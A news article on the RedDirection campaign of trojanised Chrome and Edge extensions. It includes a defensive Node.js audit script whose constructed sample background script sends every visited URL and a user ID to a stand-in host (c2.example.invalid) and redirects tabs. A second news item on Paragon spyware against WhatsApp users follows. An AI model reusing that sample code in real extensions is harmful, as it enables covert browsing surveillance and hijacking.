In Chrome and Edge there are extensions with thousands of positive reviews. Many are part of malicious campaigns

We often install extensions without thinking too much. They do something concrete, they take up little space and they are there when we need them. Some even have thousands of reviews, good ratings and years of presence in the store. Now we know that an investigation has uncovered that several of them hid a surveillance system capable of tracking our steps across the web. They were not obvious scams: they were useful, well-made tools and, above all, silent.

The extension that uncovered the problem

"Color Picker, Eyedropper – Geco Colorpick" was one of many useful extensions. It let you pick colors from anywhere on the screen and it worked well. More than 100,000 users had it installed, with positive ratings and a verified badge. To anyone's eyes there was no reason to distrust it. According to Koi Security researchers, for a long time it was completely legitimate. Until it was not. In one of its updates, without warnings or visible changes for the user, the extension began to log the pages visited and send that information to a remote server. It also kept an active connection to a command-and-control infrastructure.

That was just the beginning. Digging deeper into the case, the researchers spotted common patterns in its code and behavior. What they found was a broader, coordinated network that they named "RedDirection". According to the report, at least 18 different extensions were part of this operation. All were available in the Chrome and Edge stores, and together they accumulated more than 2.3 million installs. Some posed as productivity tools, others as entertainment utilities: emoji keyboards, video speed controllers, weather extensions, dark themes and supposed VPNs to unblock services such as TikTok or Discord. All had something in common: they offered a legitimate function while spying in the background.

What they did was not install classic malware.
These extensions implemented a browser hijacking system that was triggered every time the user opened a new tab or navigated to another page. The malicious code was hidden in the extension's background service worker and did not interfere with its main functionality.

The mechanism worked like this: every time a website loaded, its URL was sent to a remote server together with a unique per-user identifier. From there, the attackers could order an automatic redirection to a fake page or simply log the activity. Everything happened in the background, with no alerts, no pop-up windows and no visible failures.

The extensions were not malicious from day one, and that is what makes this campaign especially dangerous. According to the researchers, many of them spent months, or even longer, offering their functionality without any suspicious behavior. Everything changed with an update. The technical team maintains that the malicious code was introduced in later versions, once the extensions already had the trust of thousands of users. And since browsers update extensions automatically, the change was applied without anyone noticing. No click was needed. No social engineering. No phishing.

And the mechanisms designed to protect the user? Several of the malicious extensions were verified or appeared as featured on the Chrome and Edge platforms. Others accumulated positive reviews and a solid user base. All of that helped them go unnoticed when they changed their behavior.

These are the extensions directly linked to the RedDirection campaign, according to the analysis carried out by Koi Security researchers.
All of them offered apparently legitimate functions, but were identified as part of the same browser hijacking scheme:

Color Picker, Eyedropper – Geco Colorpick
Emoji Keyboard Online – Copy & Paste Your Emoji
Free Weather Forecast
Weather
Speed Controller Video – Video Manager
Unlock Discord – VPN Proxy to Unblock Discord Anywhere
Unblock TikTok – Seamless Access With One-Click Proxy
Unlock YouTube VPN
Dark Theme – Dark Reader for Chrome
Volume Max – Ultimate Sound Booster
Volume Booster – Increase Your Sound
Web Sound Equalizer
Flash Player – Games Emulator
Header Value
Unlock TikTok
Volume Booster
Web Sound Equalizer
Flash Player

According to BleepingComputer, some of these extensions have already been removed from the Chrome and Edge stores, but others are still available for download. Both Google and Microsoft have been notified by the Koi Security team, but for now they have not taken blanket action on the complete set of extensions detected in the campaign.
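The hijack mechanism described above (a background service worker that reports every navigation to a remote host, tagged with a per-install identifier, and can redirect the tab based on the reply) can be checked for statically in an unpacked extension. What follows is an added example written for this page; it is not Koi Security's analysis code and not code from any of the listed extensions. The two manifests, the two background scripts and the host c2.example.invalid are constructed samples standing in for a "clean" version and its malicious update, and the API strings used as indicators are an assumed heuristic, not a published detection rule. It runs under Node.js with no dependencies.

```javascript
// Heuristic audit of an unpacked extension for the RedDirection-style pattern.
// Added example, not code from Koi Security or any listed extension.
// In practice, read manifest.json and the service worker named in
// manifest.background.service_worker from the unpacked extension directory;
// here both are constructed in memory so the script runs offline.

// API strings that let a background script observe navigation (assumed indicators).
const NAV_HOOKS = [
  'chrome.webNavigation.onCompleted',
  'chrome.webNavigation.onCommitted',
  'chrome.webNavigation.onBeforeNavigate',
  'chrome.tabs.onUpdated',
];
// Ways to push the observed URL off-device.
const EXFIL_CALLS = ['fetch(', 'XMLHttpRequest', 'navigator.sendBeacon', 'new WebSocket'];
// Ways to send the tab somewhere else from the background.
const REDIRECT_CALLS = ['chrome.tabs.update', 'chrome.tabs.create'];
// Generation or persistence of a per-install identifier.
const ID_MARKERS = ['crypto.randomUUID', 'chrome.storage.local', 'chrome.storage.sync'];

// Collect every remote hostname referenced as an absolute http(s) URL.
function remoteHosts(source) {
  const re = /https?:\/\/([a-z0-9.-]+\.[a-z]{2,})/gi;
  const hosts = new Set();
  let m;
  while ((m = re.exec(source)) !== null) hosts.add(m[1].toLowerCase());
  return [...hosts].sort();
}

// True when the manifest asks for access to every site.
function hasBroadHostAccess(manifest) {
  const perms = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  return perms.some(p => p === '<all_urls>' || /^\*:\/\/\*\//.test(p) || /^https?:\/\/\*\//.test(p));
}

// Returns { verdict, findings, hosts }. 'hijack-pattern': the background can see
// navigation, reach a remote host and steer the tab. 'suspicious': it can see
// navigation and reach a remote host. 'clean': neither combination is present.
function auditExtension(manifest, backgroundSource) {
  const findings = [];
  if (hasBroadHostAccess(manifest)) findings.push('manifest grants access to all sites');
  const perms = new Set(manifest.permissions || []);
  if (perms.has('webNavigation') || perms.has('tabs')) findings.push('manifest can observe tabs/navigation');

  const navHooks = NAV_HOOKS.filter(a => backgroundSource.includes(a));
  const exfil = EXFIL_CALLS.filter(a => backgroundSource.includes(a));
  const redirect = REDIRECT_CALLS.filter(a => backgroundSource.includes(a));
  const idGen = ID_MARKERS.filter(a => backgroundSource.includes(a));
  const hosts = remoteHosts(backgroundSource);

  if (navHooks.length) findings.push(`background listens to navigation via ${navHooks.join(', ')}`);
  if (exfil.length && hosts.length) findings.push(`background contacts remote host(s): ${hosts.join(', ')}`);
  if (redirect.length) findings.push(`background can change a tab URL via ${redirect.join(', ')}`);
  if (idGen.length) findings.push('background generates or persists a per-install identifier');

  const observes = navHooks.length > 0;
  const talks = exfil.length > 0 && hosts.length > 0;
  const steers = redirect.length > 0;
  let verdict = 'clean';
  if (observes && talks && steers) verdict = 'hijack-pattern';
  else if (observes && talks) verdict = 'suspicious';
  return { verdict, findings, hosts };
}

// Constructed sample: a harmless MV3 color picker, version 1.0.
const MANIFEST_V1 = {
  manifest_version: 3, name: 'Example Color Picker', version: '1.0',
  permissions: ['activeTab', 'scripting'],
  background: { service_worker: 'background.js' },
};
const BACKGROUND_V1 = `
chrome.action.onClicked.addListener(async (tab) => {
  await chrome.scripting.executeScript({ target: { tabId: tab.id }, files: ['picker.js'] });
});
`;

// Constructed sample: the "update" keeps the picker and adds the hijack logic.
const MANIFEST_V2 = {
  ...MANIFEST_V1, version: '1.1',
  permissions: ['activeTab', 'scripting', 'tabs', 'webNavigation', 'storage'],
  host_permissions: ['<all_urls>'],
};
const BACKGROUND_V2 = BACKGROUND_V1 + `
async function installId() {
  const { uid } = await chrome.storage.local.get('uid');
  if (uid) return uid;
  const fresh = crypto.randomUUID();
  await chrome.storage.local.set({ uid: fresh });
  return fresh;
}
chrome.webNavigation.onCompleted.addListener(async ({ tabId, url, frameId }) => {
  if (frameId !== 0) return;
  const uid = await installId();
  const r = await fetch('https://c2.example.invalid/t?u=' + encodeURIComponent(url) + '&id=' + uid);
  const { redirect } = await r.json();
  if (redirect) chrome.tabs.update(tabId, { url: redirect });
});
`;

// Audit both versions; the difference is what an update-time review should catch.
function auditBothVersions() {
  return {
    before: auditExtension(MANIFEST_V1, BACKGROUND_V1).verdict,
    after: auditExtension(MANIFEST_V2, BACKGROUND_V2).verdict,
  };
}

console.log(auditBothVersions());
console.log(auditExtension(MANIFEST_V2, BACKGROUND_V2).findings.join('\n'));
```

The point of auditing both versions is the one the article makes: a check run once at install time would have passed version 1.0, so the audit has to be repeated whenever the installed version changes. The heuristic is deliberately conservative about false positives (`tabs` plus `<all_urls>` alone is common in legitimate extensions, so it only raises the verdict when observation, remote contact and redirection all appear together), and it is easily evaded by obfuscation or by building API names and URLs at runtime, so treat a "clean" result as "nothing obvious" rather than as a bill of health.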

The targets received malicious PDF files

For years, WhatsApp has bet on advanced security features. End-to-end encryption is one of the most relevant, designed so that only the participants in a conversation can see or hear what is shared. But we should not be confused: although the application is presented as a fortress, its walls are not unbreakable. The most recent example of this reality comes from Meta itself. As The Guardian reports, the company led by Mark Zuckerberg has said that around 90 users of the popular messaging service, including journalists and members of civil society, were targeted and "probably compromised" by a new targeted malware campaign.

WhatsApp, in the sights of a spyware firm

Meta says it has disrupted the malicious operation which, according to its records, was developed at the end of last year. It adds that it has contacted the people it believes were affected. It is not clear where in the world the targets were or who was behind these attacks, but there are some interesting clues. The social media giant points at Paragon, a firm of Israeli origin that develops spyware with similarities to NSO Group's Pegasus. Its hypothesis seems solid enough that it has sent a cease-and-desist letter to stop the espionage firm from continuing to threaten the safety of its users. It is also exploring legal options. One of Paragon's most prominent products is Graphite, which promises to bypass mobile phone security barriers and, in the best case, obtain total access to their data, including the ability to read messages in applications whose content is encrypted, such as WhatsApp. Paragon was acquired in December by an American firm.

When we talk about targeted attacks we mean malicious campaigns aimed at a specific set of targets, for example a company's network, a particular entity or certain people. High-profile targets enter the scene.
For example, Pegasus was used some time ago to spy on the phone of Pedro Sánchez, President of the Spanish Government. Paragon's or NSO Group's customers are usually intelligence agencies, law enforcement and other state-related agencies. But their use is not free of controversy. Some tech companies have taken measures beyond the technical: Meta and Apple have sued NSO Group in the past to demand accountability for cases of targeted surveillance. The American giant apparently does not know which "client" used Paragon's software against its WhatsApp users, but it has managed to work out part of the attack methodology. Its researchers believe the infection vector was a malicious PDF file, sent to the targets after they were added to a group.
